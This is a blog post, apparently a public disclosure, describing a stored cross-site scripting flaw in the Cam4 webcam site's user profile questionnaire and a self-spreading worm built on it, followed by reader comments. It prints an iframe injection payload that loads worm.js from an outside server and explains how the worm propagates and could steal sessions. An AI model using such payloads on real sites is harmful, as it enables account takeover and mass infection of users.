Cam4: Persistent XSS Aka Worm

A friend of mine has told me about this website so I take a look at it and i was impressed to see thousands of free live webcam with any sorts of sex perversions (sounds like a piece of paradise or hell depends from the points of view). Therefore i start thinking about security and, after 10 minutes, i found a critical flaw in the user profile.

 

In fact every user has a profile questionary that will be showed always below the webcam also during the show. The questionary inputs are NOT well filtered so i thought to use a xss as vector for the worm.

<iframe SRC=’http://funserver.com/worm.js'&lt;

|

Worm.js Source:

|

This basic worm just rewrite the victim questionary to propagate itself. As you can see, in the highlighted line, i’ve put and image with the onmouseover function in order to emulate the submit button, so when the victim move the mouse pointer over the pic the game is done and the user is infected.

|

|

These threats have a massive propagation because the infection is exponential. Usually a camshow is approximately viewed by 1000 users or so and, as the Law of large numbers teaches us, someone will pass their mouse on the “viral” image and will be infected and the story begins again but now we’ve more than one user infected that could spread the worm, in this way all the catchment area will be saturated in a few days as we already saw with twitter, myspace etc.

As i said before my worm is very basic just few lines of html and javascript to show the flaw but an attacker could use different way to improve the worm and maximize the results,  also the intent could change to steal session,data, tokens etc. I tried many times to contact the technical support to fix the problem but they didn’t reply to my advice so i leave this post as an alert for all the cam4 users.

Advertisements

4 comments

  1. Cam4 and Cam4ultimate are infected with “naiadsystems” malware.. I would get this virus only when I visited those sites.

  2. I’m not surprised…this is what happens when appropriate security measures are not taken. That’s why I wrote this post as a warning to all users. I found such vulnerability 2 years ago and it was not yet been fixed the last time I checked… almost about a year ago.

  3. Same. I just found this page today. There are also many scams there. I sent them a message about it but they did not reply.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s